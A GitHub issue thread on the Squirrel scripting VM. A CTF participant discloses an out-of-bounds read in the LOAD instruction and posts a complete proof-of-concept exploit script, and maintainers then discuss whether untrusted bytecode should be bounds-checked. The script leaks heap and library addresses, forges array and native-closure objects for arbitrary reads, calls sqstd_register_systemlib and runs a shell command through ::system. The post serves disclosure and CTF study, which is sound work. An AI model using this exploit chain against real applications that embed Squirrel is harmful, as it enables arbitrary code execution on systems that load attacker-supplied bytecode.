CherryWorm commented 4 years ago

The squirrel VM has been featured in a recent German CTF (https://earth.2020.cscg.de/). The setup was as follows: a server reads squirrel files (source code or bytecode), and executes them. The goal was to pop a shell, however the systemlib had not been registered.

There have been numerous different solutions, exploiting multiple different 0days, some source-code only, some including some patches inside the bytecode. I'm sure other people will post their writeups in the coming days as well. I think all of them are worthy of being fixed. What follows is my writeup, as well as the poc squirrel script.

The vulnerability

I exploited the following vulnerability in sqvm.cpp:

case _OP_LOAD:
    TARGET = ci->_literals[arg1];
    continue;

Here, arg1 is an arbitrary signed integer, and there are no bounds checks for the array, so this allows us to load SQObjectPtr's from an arbitrary offset onto the stack.

General setup

I wrote a small script which patches the following function in a compiled squirrel script:

function LOAD() {
    // this gets patched to LOAD 1 0x1000 0 0
    return "a"
}

As hinted at in the comment, instead of loading the string "a" and returning it (which corresponds to the instruction LOAD 1 1 0 0), my script replaces arg1 with 0x1000, which triggers the out-of-bound read.

Exploit

I used the following trick to leak addresses:

function addr(a) {
    local spl = ::split("" + a, ":")
    if (spl.len() != 2)
        throw "expected (%s : 0x%p), got " + a + " instead"
    return spl[1].slice(5, -1).tointeger(16)
}

Squirrel will print a SQObjectPtr with an unknown type in the format "(%s, 0x%p)", where %p is the second 8-bytes of this 16-byte structure. To illustrate, I use this to leak a heap-address:

local heap_base = 0xFFFFFFFFFFFFF000 & addr(getroottable())

The next thing I do is create a large, but not too large blob, which gets allocated on the heap somewhere behind the literal-array:

local size = 0x10000
local buffer = blob(size)
for (local i = 0; i < size / 8; i++) {
    writeLong(buffer, i)
}

I tag every 8-byte bundle, to later identify, which index I load onto the stack with the LOAD-primitive. By calling addr, I get the second 8-byte bundle of the struct which points somewhere into the blob.

// find index of bufferelement which gets loaded by LOAD (constants_table + 0x1000 * 0x10)
local index = addr(LOAD())

Now, if we overwrite the 8 bytes directly before this index, we control the type of the SQObjectPtr that we load onto the stack.

First of all, I use this to create a fake array, where the second 8 bytes will be the pointer the array struct is stored at:

buffer.seek(index * 8 - 8)
writeLong(buffer, 134217792)
// read some index in big buffer, to find address of the buffer
writeLong(buffer, heap_base + 0x1000 * 0x10 - 0x38)
local leak_array = LOAD()
local buffer_start = heap_base + 0x1000 * 0x10 - leak_array.len() * 8

The first address I want to leak is heap_base + 0x1000 * 0x10 (the -0x38 is just the offset of the _size field in the array struct, wihch I read by calling len() on the array). This is just some random address in the blob, but we know the actual absolute address (heap_base + 0x1000 * 0x10), which allows us to calculate the address of the start of the array, by just subtracting the index we read there, times 8, because we're dealing with 8-byte chunks. We're going to need this address later on.

We use the same trick again, but this time to leak a function pointer inside sqlstdlib, by reading the struct of a native_closure (in this case blob.tell). Then we add an offset to it, to get a pointer to the function sqstd_register_systemlib:

local tell_closure_addr = addr(blob.tell)

// write array to that index, to achieve arbitrary read 
buffer.seek(index * 8 - 8)
writeLong(buffer, 134217792)
// read function field of closure
writeLong(buffer, tell_closure_addr + 0xd * 8 - 0x38)
leak_array = LOAD()
local actual_tell_addr = leak_array.len()
local actual_register_systemlib_addr = actual_tell_addr + 15728

Now we know the absolute address of our blob and we know the absolute address of sqstd_register_systemlib. This is now enough to craft our own NativeClosure.

The layout of a SQObjectPtr to a NativeClosure is the following: the SQObjectPtr has to have the type of NativeClosure in its first 8 bytes, and a pointer to a NativeClosure in its second 8 bytes (this is what we use the absolute address of our blob for). In this struct there are a bunch of fields and a pointer to an actual c function, that gets called when we call the object in Squirrel. If all of those fields except the pointer are 0, we by default pass all checks before the actual call (this includes fields like the amount of parameters, which is why I chose to call sqstd_register_systemlib, it takes no arguments and allows arbitrary command execution afterwards). This is what the following code does:

// write SQObjectPtr of type NativeClosure, that points to our NativeClosure-struct
buffer.seek(index * 8 - 8)
writeLong(buffer, 134218240)
writeLong(buffer, buffer_start + index * 8 + 8)
// write native closure struct
writeLong(buffer, 0) // virttable
writeLong(buffer, 0) // virttable
writeLong(buffer, 0) // virttable
writeLong(buffer, 0) // virttable
writeLong(buffer, 0) // virttable
writeLong(buffer, 0) // virttable
writeLong(buffer, 0) // SQInteger _nparamscheck;
writeLong(buffer, 0) // SQIntVec _typecheck; T* _vals;
writeLong(buffer, 0) // SQIntVec _typecheck; SQUnsignedInteger _size;
writeLong(buffer, 0) // SQIntVec _typecheck; SQUnsignedInteger _allocated;
writeLong(buffer, 0) // SQObjectPtr *_outervalues;
writeLong(buffer, 0) // SQUnsignedInteger _noutervalues;
writeLong(buffer, 0) // SQWeakRef *_env;
writeLong(buffer, actual_register_systemlib_addr) // SQFUNCTION _function;
writeLong(buffer, 0) // SQObjectPtr _name;

// load and call native closure
local native_closure = LOAD()
native_closure()

Now we loaded the entire system-standard-library, including the function system. Getting the flag is now as easy as this:

::system("cat flag")

POC Script

function LOAD() {
    // this gets patched to LOAD 1 0x1000 0 0
    return "a"
}

function debug(str) {
    print("============================================ " + str + " ============================================\n")
}

function hex(i) {
    local charset = "0123456789abcdef"
    local res = ""
    local neg = false
    if (i < 0) {
        neg = true
        i = -i
    }
    do {
        local current = i & 0xF
        i = i >> 4
        res = charset.slice(current, current + 1) + res
    } while (i != 0)
    if (neg)
        return "-0x" + res
    return "0x" + res
}

function addr(a) {
    local spl = ::split("" + a, ":")
    if (spl.len() != 2)
        throw "expected (%s : 0x%p), got " + a + " instead"
    return spl[1].slice(5, -1).tointeger(16)
}

function writeLong(buf, l) {
    buf.writen(l&0xFFFFFFFF, 'i')
    buf.writen((l>>32)&0xFFFFFFFF, 'i')
}

// create big blob that we cant miss, label it so we know which index we hit with LOAD
local size = 0x10000
local buffer = blob(size)
for (local i = 0; i < size / 8; i++) {
    writeLong(buffer, i)
}

// leak some heap address thats close enough to the buffer
local heap_base = 0xFFFFFFFFFFFFF000 & addr(getroottable())

// find index of bufferelement which gets loaded by LOAD (constants_table + 0x1000 * 0x10)
local index = addr(LOAD())
debug(index)

// write array to that index, to achieve arbitrary read 
buffer.seek(index * 8 - 8)
writeLong(buffer, 134217792)
// read some index in big buffer, to find address of the buffer
writeLong(buffer, heap_base + 0x1000 * 0x10 - 0x38)
local leak_array = LOAD()
local buffer_start = heap_base + 0x1000 * 0x10 - leak_array.len() * 8
debug("buffer_start: " + hex(buffer_start))

local tell_closure_addr = addr(blob.tell)
debug("tell closure: " + hex(tell_closure_addr))

// write array to that index, to achieve arbitrary read 
buffer.seek(index * 8 - 8)
writeLong(buffer, 134217792)
// read function field of closure
writeLong(buffer, tell_closure_addr + 0xd * 8 - 0x38)
leak_array = LOAD()
local actual_tell_addr = leak_array.len()
debug("actuall tell addr: " + hex(actual_tell_addr))
local actual_register_systemlib_addr = actual_tell_addr + 15728
debug("actuall register_systemlib addr: " + hex(actual_register_systemlib_addr))

buffer.seek(index * 8 - 8)
writeLong(buffer, 134218240)
writeLong(buffer, buffer_start + index * 8 + 8)
// write native closure struct
writeLong(buffer, 1) // virttable
writeLong(buffer, 2) // virttable
writeLong(buffer, 3) // virttable
writeLong(buffer, 4) // virttable
writeLong(buffer, 5) // virttable
writeLong(buffer, 6) // virttable
writeLong(buffer, 0) // SQInteger _nparamscheck;
writeLong(buffer, 0) // SQIntVec _typecheck; T* _vals;
writeLong(buffer, 0) // SQIntVec _typecheck; SQUnsignedInteger _size;
writeLong(buffer, 0) // SQIntVec _typecheck; SQUnsignedInteger _allocated;
writeLong(buffer, 0) // SQObjectPtr *_outervalues;
writeLong(buffer, 0) // SQUnsignedInteger _noutervalues;
writeLong(buffer, 0) // SQWeakRef *_env;
writeLong(buffer, actual_register_systemlib_addr) // SQFUNCTION _function;
writeLong(buffer, 0x1337) // SQObjectPtr _name;

// load as native closure
local native_closure = LOAD()

native_closure()

::system("cat flag")

zeromus commented 4 years ago

I'm not sure what there is here for squirrel to tackle. The real vulnerability is in the service running untrusted bytecode. Even if you stuffed the VM with all the sanity checks possible so that it spent 100% of time checking sanity and 0% of time doing useful work, someone will still find a way to exploit it. I think the source-only exploits will be more interesting, since it's reasonable to do sanity checks there as a precaution against programming mistakes even if you don't have any interest in making a mission critical server application.

CherryWorm commented 4 years ago

I don't think it's unreasonable to have bound checks for things like the load instruction (there's a similar vulnerability for the move instruction), it's not like the vm is optimized to a point where this would impact performance in any way, and it could also prevent the exploitation of other bugs.

The way you put it makes it seem like it is unreasonable to assume that a vm won't have undefined behaviour no matter what kind of bytecode it executes, but I don't think most people would agree. Not only is it really not that hard to write decent, non-exploitable code that still performs well, most popular vm languages like for example Java actually guarantee this. Obviously a source-only vulnerability is more critical, but this should still either be fixed or there should be a visible warning on every function that may load bytecode that it might lead to exploitable undefined behaviour.

albertodemichelis commented 4 years ago

I think one solution would be to have a "sanitycheck" parameter in the load function that optionally boundchecks bytecode and looks for other possible exploits. I'd rather not have to do any sanity checks runtime and especially in an environment where the source is trusted. Squirrel's bytecode was never meant to be executed from an untrusted source but I can understand that someone might want it I think to make a "safe" bytecode java style is a quite ambitious task.

albertodemichelis / squirrel

Out of bounds read in LOAD-instruction can be abused for arbitrary code execution #219

The vulnerability

General setup

Exploit

POC Script